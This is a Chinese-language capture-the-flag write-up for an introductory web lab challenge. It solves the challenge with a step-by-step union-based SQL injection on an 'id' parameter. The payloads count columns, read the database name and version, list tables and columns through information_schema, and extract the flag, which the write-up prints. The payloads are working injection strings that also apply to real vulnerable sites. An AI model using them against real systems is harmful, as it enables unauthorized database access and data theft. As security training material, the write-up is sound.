[第一章 web入门]SQL注入-1
启动靶机
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/oiluetnz_7ot3.png)
很明显注入点为id值,单引号闭合影响语句,说明为单引号闭合
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/psolwlzj_c8nv.png)
构造注入语句 ?id=1 ' and 1 =1 --+
发现没报错,说明没有其他过滤 ,开始sql注入
?id=1 ' order by 4 --+
直到=4报错说明有3个字节段
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/frklsovl_2gl1.png)
测试回显位2,3
?id=1 ' and 1 = 2 union select 1,2,3 --+
![](https://img.shuduke.com/static_img/cnblogs/blog/3518346/202409/kpsmsmdn_hjrd.png)
测试当前数据库名note,版本MariaDB-1ubuntu0.14.04.1
?id=1 ' and 1 = 2 union select 1,database(),version() --+
获得表名 fl4g,notes
?id=1 ' and 1 = 2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='note' --+
继续获得列名fllllag ?id=1 ' and 1 = 2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema ='note' and table_name='fl4g' --+
查找表获得flag n1book{union_select_is_so_cool}
?id=1 ' and 1 = 2 union select 1,2,group_concat(fllllag) from fl4g--+